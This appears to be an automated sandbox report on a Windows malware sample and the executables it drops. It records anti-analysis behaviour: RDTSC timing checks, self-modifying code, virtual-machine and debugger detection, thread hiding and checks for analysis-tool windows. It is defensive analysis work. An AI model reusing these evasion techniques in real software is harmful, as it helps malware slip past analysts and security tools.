Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59605D8 second address: 59605DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59605DC second address: 59605E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59605E0 second address: 59605E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59605E6 second address: 596060E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD164D1C75Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 596060E second address: 5960612 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5960612 second address: 5960618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5960618 second address: 5960629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164C5471Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5960629 second address: 596066F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d call 00007FD164D1C75Ch 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007FD164D1C75Ch 0x0000001b sbb si, B2C8h 0x00000020 jmp 00007FD164D1C75Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5950796 second address: 595079A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 595079A second address: 59507E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007FD164D1C75Ah 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edx 0x00000012 pop esi 0x00000013 pushfd 0x00000014 jmp 00007FD164D1C769h 0x00000019 and cx, 85E6h 0x0000001e jmp 00007FD164D1C761h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59507E4 second address: 5950823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FD164C5471Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD164C54727h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0210 second address: 58F0216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0216 second address: 58F021A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F021A second address: 58F0232 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD164D1C75Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0232 second address: 58F0238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0238 second address: 58F023E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F023E second address: 58F0242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0242 second address: 58F0272 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FD164D1C760h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 movsx edx, cx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0272 second address: 58F0278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58F0278 second address: 58F027C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5950BE2 second address: 5950C5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD164C5471Eh 0x00000013 or ch, 00000008h 0x00000016 jmp 00007FD164C5471Bh 0x0000001b popfd 0x0000001c popad 0x0000001d push dword ptr [ebp+0Ch] 0x00000020 pushad 0x00000021 movsx ebx, si 0x00000024 mov al, EFh 0x00000026 popad 0x00000027 push dword ptr [ebp+08h] 0x0000002a pushad 0x0000002b pushad 0x0000002c mov ecx, edi 0x0000002e mov dl, 57h 0x00000030 popad 0x00000031 popad 0x00000032 push 35A0E6AEh 0x00000037 jmp 00007FD164C54722h 0x0000003c xor dword ptr [esp], 35A1E6ACh 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FD164C54727h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59004C7 second address: 5900523 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD164D1C767h 0x00000009 jmp 00007FD164D1C763h 0x0000000e popfd 0x0000000f mov ax, A3CFh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 jmp 00007FD164D1C762h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FD164D1C75Ch 0x00000025 push eax 0x00000026 pop ebx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5900523 second address: 59005D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD164C54728h 0x00000009 adc esi, 24960C08h 0x0000000f jmp 00007FD164C5471Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 jmp 00007FD164C54726h 0x0000001e mov ebp, esp 0x00000020 jmp 00007FD164C54720h 0x00000025 push FFFFFFFEh 0x00000027 jmp 00007FD164C54720h 0x0000002c call 00007FD164C54719h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov eax, edx 0x00000036 pushfd 0x00000037 jmp 00007FD164C54729h 0x0000003c xor eax, 5A1DF1E6h 0x00000042 jmp 00007FD164C54721h 0x00000047 popfd 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59005D0 second address: 59005D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59005D6 second address: 5900613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD164C54729h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5900613 second address: 5900617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5900617 second address: 590061B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 590061B second address: 5900621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\pud8g3zixE.exe	Special instruction interceptor: First address: FAE995 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Special instruction interceptor: First address: 1161944 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Special instruction interceptor: First address: FAC096 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Special instruction interceptor: First address: 1169627 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Special instruction interceptor: First address: 11F280C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Special instruction interceptor: First address: 90E995 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Special instruction interceptor: First address: AC1944 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Special instruction interceptor: First address: 90C096 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Special instruction interceptor: First address: AC9627 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Special instruction interceptor: First address: B5280C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Special instruction interceptor: First address: 10A37DD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Special instruction interceptor: First address: 10A38C6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Special instruction interceptor: First address: 125F802 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Special instruction interceptor: First address: 123D58F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Special instruction interceptor: First address: 10A37E9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Special instruction interceptor: First address: 12CBB37 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Special instruction interceptor: First address: 5937DD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Special instruction interceptor: First address: 5938C6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Special instruction interceptor: First address: 74F802 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Special instruction interceptor: First address: 72D58F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Special instruction interceptor: First address: 5937E9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Special instruction interceptor: First address: 7BBB37 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\pud8g3zixE.exe

Code function: 0_2_05950BAC rdtsc

0_2_05950BAC

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window / User API: threadDelayed 3767			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Window / User API: threadDelayed 3571			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

API coverage: 3.2 %

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7640	Thread sleep count: 55 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7640	Thread sleep time: -110055s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7656	Thread sleep count: 56 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7656	Thread sleep time: -112056s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7660	Thread sleep count: 58 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7660	Thread sleep time: -116058s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7620	Thread sleep count: 339 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7620	Thread sleep time: -10170000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7636	Thread sleep count: 3767 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7636	Thread sleep time: -7537767s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7652	Thread sleep count: 58 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7652	Thread sleep time: -116058s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7760	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7632	Thread sleep count: 3571 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7632	Thread sleep time: -7145571s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7644	Thread sleep count: 59 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7644	Thread sleep time: -118059s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7636	Thread sleep count: 269 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7636	Thread sleep time: -538269s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7632	Thread sleep count: 115 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe TID: 7632	Thread sleep time: -230115s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe TID: 3020	Thread sleep time: -114000s >= -30000s

Source: C:\Users\user\Desktop\pud8g3zixE.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DBDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	21_2_00DBDBBE
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00D8C2A2 FindFirstFileExW,	21_2_00D8C2A2
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC68EE FindFirstFileW,FindClose,	21_2_00DC68EE
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	21_2_00DC698F
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DBD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_00DBD076
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DBD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_00DBD3A9
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_00DC9642
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_00DC979D
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	21_2_00DC9B2B
Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe	Code function: 21_2_00DC5C97 FindFirstFileW,FindNextFileW,FindClose,	21_2_00DC5C97

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00D542DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

21_2_00D542DE

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: svoutse.exe, svoutse.exe, 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmp, 76251a0626.exe, 76251a0626.exe, 00000014.00000002.1545443522.0000000001214000.00000040.00000001.01000000.00000009.sdmp, 88b8632b35.exe, 88b8632b35.exe, 0000001D.00000002.1702924544.0000000000704000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: firefox.exe, 0000001F.00000002.3722569982.000002FB91640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXC
Source: firefox.exe, 0000001F.00000002.3722569982.000002FB91640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll#@b
Source: svoutse.exe, 0000000F.00000002.3716587854.0000000001099000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: firefox.exe, 0000001F.00000002.3715081178.000002FB90DFA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW4
Source: firefox.exe, 00000027.00000002.3720191436.000001E51AA40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWds
Source: svoutse.exe, 0000000F.00000002.3716587854.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 76251a0626.exe, 00000014.00000002.1561942883.0000000001853000.00000004.00000020.00020000.00000000.sdmp, 76251a0626.exe, 00000014.00000002.1561942883.0000000001826000.00000004.00000020.00020000.00000000.sdmp, 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001144000.00000004.00000020.00020000.00000000.sdmp, 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001105000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3715081178.000002FB90DFA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3713346875.000001E51A2FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 88b8632b35.exe, 0000001D.00000002.1703865984.00000000010BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: firefox.exe, 00000019.00000003.1735729821.000001EBED5BF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3721335740.000002FB91215000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: firefox.exe, 00000027.00000002.3720191436.000001E51AA40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgG3
Source: 76251a0626.exe, 00000014.00000002.1561942883.00000000017DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareGh]
Source: pud8g3zixE.exe, 00000000.00000002.1285698873.000000000113D000.00000040.00000001.01000000.00000003.sdmp, svoutse.exe, 00000002.00000002.1308323584.0000000000A9D000.00000040.00000001.01000000.00000007.sdmp, svoutse.exe, 00000005.00000002.1321140566.0000000000A9D000.00000040.00000001.01000000.00000007.sdmp, svoutse.exe, 0000000F.00000002.3707400691.0000000000A9D000.00000040.00000001.01000000.00000007.sdmp, 76251a0626.exe, 00000014.00000002.1545443522.0000000001214000.00000040.00000001.01000000.00000009.sdmp, 88b8632b35.exe, 0000001D.00000002.1702924544.0000000000704000.00000040.00000001.01000000.0000000F.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 88b8632b35.exe, 0000001D.00000002.1703865984.0000000001131000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWNW
Source: firefox.exe, 0000001F.00000002.3715081178.000002FB90DFA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3722569982.000002FB91640000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3720191436.000001E51AA40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\pud8g3zixE.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\pud8g3zixE.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\pud8g3zixE.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Thread information set: HideFromDebugger

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Code function: 15_2_04D30BB1 Start: 04D30BED End: 04D30BE9

15_2_04D30BB1

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\pud8g3zixE.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\pud8g3zixE.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000030001\88b8632b35.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\pud8g3zixE.exe

Code function: 0_2_05950BAC rdtsc

0_2_05950BAC

Source: C:\Users\user\AppData\Local\Temp\1000029001\139d3265bb.exe

Code function: 21_2_00DCEAA2 BlockInput,

